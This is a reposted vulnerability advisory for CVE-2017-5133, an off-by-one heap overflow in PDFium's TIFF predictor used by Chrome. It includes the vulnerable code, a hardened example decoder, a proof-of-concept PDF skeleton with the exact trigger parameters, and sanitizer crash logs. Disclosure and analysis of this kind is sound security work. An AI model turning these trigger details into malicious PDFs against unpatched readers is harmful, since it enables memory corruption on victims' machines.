Google PDFium TIFF Image F

Published: 2017-10-29 01:08

CVE ID:

CVE-2017-5133

Summary

An out-of-bounds heap read/write vulnerability exists in the TIFF image decoder functionality of PDFium as used by the Chrome browser, up to and including version 60.0.3112.101. A specially crafted PDF file can trigger an off-by-one read and write on the heap, resulting in memory corruption, possible information leakage and potential code execution. The victim needs to open the malicious PDF in the browser to trigger this vulnerability.

Tested Versions

Google Chrome 60.0.3112.101

Product URL

https://pdfium.googlesource.com

CVSSv3 Score

7.5 - CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Details

PDFium is an open-source PDF renderer developed by Google; it is widely used in the Chrome browser, in online services and in other standalone applications. This bug was tested against the latest git revision as well as the latest Chromium AddressSanitizer build (asan-linux-release-498039).

A heap buffer overflow exists in the code responsible for decoding compressed TIFF image streams. While parsing the pixel data of a Flate-encoded image stream, the TIFF_PredictLine function is reached:

void TIFF_PredictLine(uint8_t* dest_buf,
                      uint32_t row_size,
                      int BitsPerComponent,
                      int Colors,
                      int Columns) {
  int BytesPerPixel = BitsPerComponent * Colors / 8;
  if (BitsPerComponent == 16) {
    // Each iteration touches dest_buf[i - BytesPerPixel .. i + 1]; the loop
    // bound only checks i < row_size, so dest_buf[i + 1] can lie one byte
    // past the end of the row.
    for (uint32_t i = BytesPerPixel; i < row_size; i += 2) {
      uint16_t pixel =
          (dest_buf[i - BytesPerPixel] << 8) | dest_buf[i - BytesPerPixel + 1];
      pixel += (dest_buf[i] << 8) | dest_buf[i + 1];
      dest_buf[i] = pixel >> 8;
      dest_buf[i + 1] = (uint8_t)pixel;
    }
    return;
  }
  // ... (remaining bit depths omitted in the advisory)
}

In the code above, every iteration of the for loop reads 4 bytes from dest_buf (two for the previous sample, two for the current one), even when the remaining row is shorter than that. This can lead to an off-by-one read on the heap, immediately followed by an off-by-one write. For the vulnerable code to be reached and the vulnerable state to be triggered, several conditions must be met. In the calling function, TIFF_Predictor, we see:

bool TIFF_Predictor(uint8_t*& data_buf,
                    uint32_t& data_size,
                    int Colors,
                    int BitsPerComponent,
                    int Columns) {
  int row_size = (Colors * BitsPerComponent * Columns + 7) / 8;              [1]
  if (row_size == 0)
    return false;
  const int row_count = (data_size + row_size - 1) / row_size;
  const int last_row_size = data_size % row_size;                            [2]
  for (int row = 0; row < row_count; row++) {
    uint8_t* scan_line = data_buf + row * row_size;
    if ((row + 1) * row_size > (int)data_size) {
      row_size = last_row_size;                                              [3]
    }
    TIFF_PredictLine(scan_line, row_size, BitsPerComponent, Colors, Columns); [4]
  }
  return true;
}

At [1], row_size is computed, with the bit count rounded up to a multiple of 8 (i.e. whole bytes). At [2], the size of the last row is computed, because the input data may not contain a full row_size worth of bytes. When the last row is reached (that is, when the next row would end beyond data_size), row_size is set to last_row_size at [3]. At [4], the vulnerable function TIFF_PredictLine is called with this computed last_row_size as its row size. If the buffer sizes are arranged appropriately, the final row_size can be 3, while TIFF_PredictLine actually reads and writes 4 bytes of the data buffer, producing the off-by-one read and write.
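The following C program is an added example written for this article; it is neither the advisory's code nor PDFium's. It re-derives the row geometry of TIFF_Predictor at [1] and [2], computes the highest byte index the original 16-bit loop touches for a given row size (so the 3-byte tail case is visible without a sanitizer), and pairs that with a hardened line decoder that only processes complete two-byte samples. The hardened loop (`i + 1 < row_size`) is an illustrative fix, not the patch PDFium shipped; all function names are this example's own, and the sample bytes are constructed. The guard-byte demo uses the same parameters as the sample PDF shown below (Columns 2, Colors 1, BitsPerComponent 16) with a 23-byte decoded stream.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Row geometry exactly as TIFF_Predictor derives it at [1] and [2]. */
typedef struct {
    int row_size;       /* bytes per full row: bit count rounded up to whole bytes */
    int row_count;      /* rows needed to cover data_size, including a partial tail */
    int last_row_size;  /* bytes in the trailing partial row, 0 when rows divide evenly */
} row_geometry;

static row_geometry tiff_row_geometry(uint32_t data_size, int colors,
                                      int bits_per_component, int columns) {
    row_geometry g = {0, 0, 0};
    g.row_size = (colors * bits_per_component * columns + 7) / 8;
    if (g.row_size == 0)
        return g;
    g.row_count = (int)((data_size + g.row_size - 1) / g.row_size);
    g.last_row_size = (int)(data_size % g.row_size);
    return g;
}

/* Highest index the original 16-bit loop touches on a row of row_size bytes
 * (it always reads and writes dest_buf[i + 1]), or -1 if the loop never runs.
 * A result >= row_size means the loop steps past the end of the row. */
static int vulnerable_loop_max_index(uint32_t row_size, int bytes_per_pixel) {
    int max_index = -1;
    for (uint32_t i = (uint32_t)bytes_per_pixel; i < row_size; i += 2)
        max_index = (int)i + 1;
    return max_index;
}

/* Hardened 16-bit horizontal-differencing (Predictor 2) line decoder. The
 * condition "i + 1 < row_size" guarantees both bytes of each sample lie inside
 * the row; a dangling odd byte is left untouched. Returns bytes written.
 * Illustrative hardening only, not PDFium's actual patch. */
static size_t tiff_predict_line16_safe(uint8_t *dest_buf, uint32_t row_size, int colors) {
    uint32_t bytes_per_pixel = (uint32_t)(16 * colors / 8);
    size_t written = 0;
    for (uint32_t i = bytes_per_pixel; i + 1 < row_size; i += 2) {
        uint16_t prev = (uint16_t)((dest_buf[i - bytes_per_pixel] << 8) |
                                   dest_buf[i - bytes_per_pixel + 1]);
        uint16_t cur  = (uint16_t)((dest_buf[i] << 8) | dest_buf[i + 1]);
        uint16_t pixel = (uint16_t)(prev + cur);
        dest_buf[i]     = (uint8_t)(pixel >> 8);
        dest_buf[i + 1] = (uint8_t)pixel;
        written += 2;
    }
    return written;
}

/* Drives the safe line decoder over a whole buffer with the same row loop as
 * TIFF_Predictor, including the shortened last row. */
static void tiff_predictor_safe(uint8_t *data_buf, uint32_t data_size, int colors,
                                int bits_per_component, int columns) {
    row_geometry g = tiff_row_geometry(data_size, colors, bits_per_component, columns);
    if (g.row_size == 0 || bits_per_component != 16)
        return;
    for (int row = 0; row < g.row_count; row++) {
        uint32_t row_size = (uint32_t)g.row_size;
        if ((uint32_t)(row + 1) * (uint32_t)g.row_size > data_size)
            row_size = (uint32_t)g.last_row_size;
        tiff_predict_line16_safe(data_buf + (size_t)row * (size_t)g.row_size, row_size, colors);
    }
}

/* Decodes a constructed one-row, two-sample 16-bit line {0x000A, +0x0005}
 * and returns the reconstructed second sample (0x000F). */
static uint16_t demo_two_sample_row(void) {
    uint8_t row[4] = {0x00, 0x0A, 0x00, 0x05};  /* constructed input */
    tiff_predict_line16_safe(row, 4, 1);
    return (uint16_t)((row[2] << 8) | row[3]);
}

/* Reproduces the sample PDF's geometry (Columns 2, Colors 1, BitsPerComponent 16,
 * 23 decoded bytes) on a constructed buffer with one guard byte past the end.
 * Returns 1 if the guard survives, 0 if the decoder overran. */
static int demo_poc_geometry_guard_intact(void) {
    uint8_t buf[24];
    memset(buf, 0x11, 23);   /* constructed sample data, not the advisory's stream */
    buf[23] = 0xA5;          /* guard byte: where the 24th byte would be */
    tiff_predictor_safe(buf, 23, 1, 16, 2);
    return buf[23] == 0xA5;
}

int main(void) {
    row_geometry g = tiff_row_geometry(23, 1, 16, 2);
    printf("row_size=%d row_count=%d last_row_size=%d\n",
           g.row_size, g.row_count, g.last_row_size);
    printf("original loop on a 3-byte tail touches index %d (valid indices 0..2)\n",
           vulnerable_loop_max_index(3, 2));
    printf("guard intact after safe decode: %d\n", demo_poc_geometry_guard_intact());
    return 0;
}
```

With 23 decoded bytes the geometry is row_size 4, row_count 6 and last_row_size 3; the original loop on that 3-byte tail touches index 3, exactly the "0 bytes to the right of 23-byte region" that AddressSanitizer reports further down.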
A sample PDF that triggers this bug is:

%PDF-1.6
47 0 obj
<<
  /DecodeParms <<
    /Columns 2
    /Colors 1
    /BitsPerComponent 16
    /Predictor 2
  >>
  /Filter /FlateDecode
  /W [0 0 0]
>>
stream
...
endstream
endobj
startxref
30
%%EOF

The stream content above only has to satisfy one condition: it must decode to a length that yields 3 in the calculation at [2] in the code shown earlier. The minimum length that satisfies this and the other conditions mentioned is 23. The values of Columns, Colors and the uncompressed stream length can be adjusted to control the buffer, the byte access and all the values that end up being passed to the function we discussed. Depending on the underlying allocator and other variables, abusing this bug for a controlled memory overwrite may not be feasible, but it could be combined with other vulnerabilities to cause further memory corruption. Crash information from the build used at the time (asan-linux-release-498039):

Rendering PDF file poc_test.pdf.

=================================================================

==67198==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000003177 at pc 0x0000025b0826 bp 0x7fffffffcf70 sp 0x7fffffffcf68
READ of size 1 at 0x603000003177 thread T0
    #0 0x25b0825 in _ZN12_GLOBAL__N_116TIFF_PredictLineEPhjiii ./out/Release/../../third_party/pdfium/core/fxcodec/codec/fx_codec_flate.cpp:478
    #1 0x25b0825 in ?? ??:0
    #2 0x25b2646 in TIFF_Predictor ./out/Release/../../third_party/pdfium/core/fxcodec/codec/fx_codec_flate.cpp:504
    #3 0x25b2646 in FlateOrLZWDecode ./out/Release/../../third_party/pdfium/core/fxcodec/codec/fx_codec_flate.cpp:805
    #4 0x25b2646 in ?? ??:0
    #5 0x2423440 in _Z24FPDFAPI_FlateOrLZWDecodebPKhjP15CPDF_DictionaryjPPhPj ./out/Release/../../third_party/pdfium/core/fpdfapi/parser/fpdf_parser_decode.cpp:319
    #6 0x2423440 in ?? ??:0
    #7 0x24240a9 in _Z14PDF_DataDecodePKhjPK15CPDF_DictionaryjbPPhPjP14CFX_ByteStringPPS1_ crtstuff.c:?
    #8 0x24240a9 in ?? ??:0
    #9 0x2412602 in _ZN14CPDF_StreamAcc11LoadAllDataEbjb ./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_stream_acc.cpp:45
    #10 0x2412602 in ?? ??:0
    #11 0x23faa1b in _ZN11CPDF_Parser14LoadCrossRefV5EPlb ./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:1085
    #12 0x23faa1b in ?? ??:0
    #13 0x23ed71a in _ZN11CPDF_Parser17LoadAllCrossRefV5El ./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:645
    #14 0x23ed71a in ?? ??:0
    #15 0x23eaf90 in _ZN11CPDF_Parser18StartParseInternalEP13CPDF_Document ./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:248
    #16 0x23eaf90 in ?? ??:0
    #17 0x20f747b in _ZN12_GLOBAL__N_116LoadDocumentImplERK13CFX_RetainPtrI22IFX_SeekableReadStreamEPKc ./out/Release/../../third_party/pdfium/fpdfsdk/fpdfview.cpp:288
    #18 0x20f747b in ?? ??:0
    #19 0x20f7734 in FPDF_LoadCustomDocument ./out/Release/../../third_party/pdfium/fpdfsdk/fpdfview.cpp:629
    #20 0x20f7734 in ?? ??:0
    #21 0x4f64b0 in _ZN12_GLOBAL__N_19RenderPdfERKNSt3__112basic_stringIcNS0_11char_traitsIcEENS0_9allocatorIcEEEEPKcmRKNS_7OptionsES8_ ./out/Release/../../third_party/pdfium/samples/pdfium_test.cc:1406
    #22 0x4f64b0 in ?? ??:0
    #23 0x4f3b7f in main ./out/Release/../../third_party/pdfium/samples/pdfium_test.cc:1624
    #24 0x4f3b7f in ?? ??:0
    #25 0x7ffff624e82f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291
    #26 0x7ffff624e82f in ?? ??:0

0x603000003177 is located 0 bytes to the right of 23-byte region [0x603000003160,0x603000003177)
allocated by thread T0 here:
    #0 0x4c48e3 in __interceptor_malloc ??:?
    #1 0x4c48e3 in ?? ??:0
    #2 0x25b2106 in PartitionAllocGenericFlags ./out/Release/../../third_party/pdfium/third_party/base/allocator/partition_allocator/partition_alloc.h:787
    #3 0x25b2106 in FX_SafeAlloc ./out/Release/../../third_party/pdfium/core/fxcrt/fx_memory.h:46
    #4 0x25b2106 in FX_AllocOrDie ./out/Release/../../third_party/pdfium/core/fxcrt/fx_memory.h:67
    #5 0x25b2106 in FlateUncompress ./out/Release/../../third_party/pdfium/core/fxcodec/codec/fx_codec_flate.cpp:556
    #6 0x25b2106 in FlateOrLZWDecode ./out/Release/../../third_party/pdfium/core/fxcodec/codec/fx_codec_flate.cpp:794
    #7 0x25b2106 in ?? ??:0
    #8 0x2423440 in _Z24FPDFAPI_FlateOrLZWDecodebPKhjP15CPDF_DictionaryjPPhPj ./out/Release/../../third_party/pdfium/core/fpdfapi/parser/fpdf_parser_decode.cpp:319
    #9 0x2423440 in ?? ??:0
    #10 0x24240a9 in _Z14PDF_DataDecodePKhjPK15CPDF_DictionaryjbPPhPjP14CFX_ByteStringPPS1_ crtstuff.c:?
    #11 0x24240a9 in ?? ??:0
    #12 0x2412602 in _ZN14CPDF_StreamAcc11LoadAllDataEbjb ./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_stream_acc.cpp:45
    #13 0x2412602 in ?? ??:0
    #14 0x23faa1b in _ZN11CPDF_Parser14LoadCrossRefV5EPlb ./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:1085
    #15 0x23faa1b in ?? ??:0
    #16 0x23ed71a in _ZN11CPDF_Parser17LoadAllCrossRefV5El ./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:645
    #17 0x23ed71a in ?? ??:0
    #18 0x23eaf90 in _ZN11CPDF_Parser18StartParseInternalEP13CPDF_Document ./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:248
    #19 0x23eaf90 in ?? ??:0
    #20 0x20f747b in _ZN12_GLOBAL__N_116LoadDocumentImplERK13CFX_RetainPtrI22IFX_SeekableReadStreamEPKc ./out/Release/../../third_party/pdfium/fpdfsdk/fpdfview.cpp:288
    #21 0x20f747b in ?? ??:0
    #22 0x20f7734 in FPDF_LoadCustomDocument ./out/Release/../../third_party/pdfium/fpdfsdk/fpdfview.cpp:629
    #23 0x20f7734 in ?? ??:0
    #24 0x4f64b0 in _ZN12_GLOBAL__N_19RenderPdfERKNSt3__112basic_stringIcNS0_11char_traitsIcEENS0_9allocatorIcEEEEPKcmRKNS_7OptionsES8_ ./out/Release/../../third_party/pdfium/samples/pdfium_test.cc:1406
    #25 0x4f64b0 in ?? ??:0
    #26 0x4f3b7f in main ./out/Release/../../third_party/pdfium/samples/pdfium_test.cc:1624
    #27 0x4f3b7f in ?? ??:0
    #28 0x7ffff624e82f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291
    #29 0x7ffff624e82f in ?? ??:0

SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/user/pdfium/repo/asan-linux-release-498039/pdfium_test+0x25b0825)
Shadow bytes around the buggy address:
  0x0c067fff85d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff85e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff85f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff8600: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
  0x0c067fff8610: fd fd fa fa fd fd fd fa fa fa fd fd fd fa fa fa
=>0x0c067fff8620: fd fd fd fa fa fa fd fd fd fa fa fa 00 00[07]fa
  0x0c067fff8630: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff8640: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff8650: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff8660: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff8670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==67198==ABORTING

BugId output from the latest official Chrome release running on Windows with PageHeap enabled:

BugId: OOBW[0x1FB]+0~1#b6d7 c40.313
Location: chrome.exe!verifier.dll!AVrfpDphCheckPageHeapBlock
Description: Page heap detected heap corruption at 0x8EA7FFB; at the end of a 507/0x1FB bytes heap block at 0x8EA7E00. This appears to be a classic buffer-overrun vulnerability. The following byte values were written to the corrupted area: 22.
Version: chrome.exe: 60.0.3112.113 (x86)
verifier.dll: 6.1.7600.16385 (x86)
Security impact: Potentially highly exploitable security issue.
Integrity level: 0x2000 (Medium Integrity; this process appears to not be sandboxed!)
Arguments: ['--enable-experimental-accessibility-features', '--enable-experimental-canvas-features', '--enable-experimental-input-view-features', '--enable-experimental-web-platform-features', '--enable-logging=stderr', '--enable-usermedia-screen-capturing', '--enable-viewport', '--enable-webgl-draft-extensions', '--enable-webvr', '--expose-internals-for-testing', '--disable-popup-blocking', '--disable-prompt-on-repost', '--force-renderer-accessibility', '--javascript-harmony', '--js-flags="--expose-gc"', '--no-sandbox', 'c:\\Users\\ea\\Desktop\\poc.pdf']
Stack:
1.verifier.dll!VerifierStopMessage + 0x1F8 (this frame is irrelevant to this bug)
2.verifier.dll!AVrfpDphReportCorruptedBlock + 0x1C2 (this frame is irrelevant to this bug)
3.verifier.dll!AVrfpDphCheckPageHeapBlock + 0x161 (id: c40)
4.verifier.dll!AVrfpDphFindBusyMemory + 0xDA (id: 313)
5.verifier.dll!AVrfpDphFindBusyMemoryAndRemoveFromBusyList + 0x20
6.ntdll.dll!RtlpDebugPageHeapFree + ? (the exact offset is not known)
7.ntdll.dll!RtlDebugFreeHeap + 0x2F
8.ntdll.dll!RtlpFreeHeap + 0x5D
9.ntdll.dll!RtlFreeHeap + 0x142
10.kernel32.dll!HeapFree + 0x14
11.chrome_child.dll + 0x163239 (no function symbol available)
12.chrome_child.dll + 0x1852FAA (no function symbol available)
13.chrome_child.dll + 0x184DDD1 (no function symbol available)
14.chrome_child.dll + 0x1846493 (no function symbol available)
15.chrome_child.dll + 0x18488BD (no function symbol available)
16.chrome_child.dll + 0x18485B5 (no function symbol available)
17.chrome_child.dll + 0x1823308 (no function symbol available)
18.chrome_child.dll + 0x18175AB (no function symbol available)
19.chrome_child.dll + 0x181413D (no function symbol available)
20.chrome_child.dll + 0x181468D (no function symbol available)
21.chrome_child.dll + 0x181F15A (no function symbol available)
22.chrome_child.dll + 0x181E1AF (no function symbol available)
23.chrome_child.dll + 0x17CA70A (no function symbol available)
24.chrome_child.dll + 0x1437254 (no function symbol available)
25.chrome_child.dll + 0x143797E (no function symbol available)
26.chrome_child.dll + 0x16729C1 (no function symbol available)

Page heap output for heap block near 0x8EA7FFB
address 08ea7e00 found in
_DPH_HEAP_ROOT @ 4161000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
8712000: 8ea7e00 1fb - 8ea7000 2000
6ccf8e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
77876206 ntdll!RtlDebugAllocateHeap+0x00000030
7783a127 ntdll!RtlpAllocateHeap+0x000000c4
77805950 ntdll!RtlAllocateHeap+0x0000023a
58de52c3 chrome_child!ovly_debug_event+0x0014dff3
5a357dd2 chrome_child!IsSandboxedProcess+0x003fb31f
5a3cf306 chrome_child!IsSandboxedProcess+0x00472853
5a379bca chrome_child!IsSandboxedProcess+0x0041d117
5a37a05d chrome_child!IsSandboxedProcess+0x0041d5aa
5a38311c chrome_child!IsSandboxedProcess+0x00426669
5a376b0e chrome_child!IsSandboxedProcess+0x0041a05b
5a376493 chrome_child!IsSandboxedProcess+0x004199e0
5a3788bd chrome_child!IsSandboxedProcess+0x0041be0a
5a3785b5 chrome_child!IsSandboxedProcess+0x0041bb02
5a353308 chrome_child!IsSandboxedProcess+0x003f6855
5a3475ab chrome_child!IsSandboxedProcess+0x003eaaf8
5a34413d chrome_child!IsSandboxedProcess+0x003e768a
5a34468d chrome_child!IsSandboxedProcess+0x003e7bda
5a34f15a chrome_child!IsSandboxedProcess+0x003f26a7
5a34e1af chrome_child!IsSandboxedProcess+0x003f16fc
5a2fa70a chrome_child!IsSandboxedProcess+0x0039dc57
59f67254 chrome_child!IsSandboxedProcess+0x0000a7a1
59f6797e chrome_child!IsSandboxedProcess+0x0000aecb
5a1a29c1 chrome_child!IsSandboxedProcess+0x00245f0e
5a1a2be2 chrome_child!IsSandboxedProcess+0x0024612f
5a17e7ea chrome_child!IsSandboxedProcess+0x00221d37
5a17e9fb chrome_child!IsSandboxedProcess+0x00221f48
58c33f7e chrome_child+0x00103f7e
58c31129 chrome_child+0x00101129
58c33bc4 chrome_child+0x00103bc4
58c996e8 chrome_child!ovly_debug_event+0x00002418
58f54b95 chrome_child!ChromeMain+0x0000b501

Timeline

2017-09-05 – Vendor disclosure
2017-10-19 – Public release

Reference: https://www.talosintelligence.com/reports/TALOS-2017-0432

*Author: 生如夏花. When reposting, please credit FreeBuf.COM
